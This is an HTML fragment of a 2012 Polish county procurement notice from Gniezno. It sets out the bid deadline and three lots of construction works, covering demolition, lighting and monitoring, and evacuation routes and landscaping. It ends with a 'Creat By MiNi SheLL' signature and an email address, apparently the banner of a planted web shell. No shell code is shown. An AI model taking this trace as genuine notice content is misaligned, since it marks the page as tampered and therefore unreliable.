<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2012 godzina 10:30, miejsce: Starostwo Powiatowe w Gnieźnie, ul. Jana Pawła II 9/10, 62-200 Gniezno, parter budynku, Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa robót 1: Przygotowanie terenu pod inwestycję - rozbiórka budynku poczty;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie terenu pod inwestycję - rozbiórka budynku poczty;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.27.00-2, 45.31.43.00-4, 45.31.61.00-6, 45.21.42.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa robót 2: Oświetlenie zewnętrzne; Monitoring zewnętrzny; Wykonanie wewnętrznej zasilającej instalacji  elektrycznej w PUP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oświetlenie zewnętrzne; Monitoring zewnętrzny; Wykonanie wewnętrznej zasilającej instalacji  elektrycznej w PUP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.27.00-2, 45.31.43.00-4, 45.31.61.00-6, 45.21.42.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa robót 3: Wykonanie ciągów ewakuacyjnych w budynku głównym (przejścia 
i drzwi EI-60); Przygotowanie terenu pod inwestycję - roboty rozbiórkowe; Mała architektura; Przebudowa ogrodzenia od strony ul. Sobieskiego; Wykonanie chodników; Przebudowa  drogi wewnętrznej; Urządzanie terenów zieleni..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie ciągów ewakuacyjnych w budynku głównym (przejścia 
i drzwi EI-60); Przygotowanie terenu pod inwestycję - roboty rozbiórkowe; Mała architektura; Przebudowa ogrodzenia od strony ul. Sobieskiego; Wykonanie chodników; Przebudowa  drogi wewnętrznej; Urządzanie terenów zieleni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.27.00-2, 45.31.43.00-4, 45.31.61.00-6, 45.21.42.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com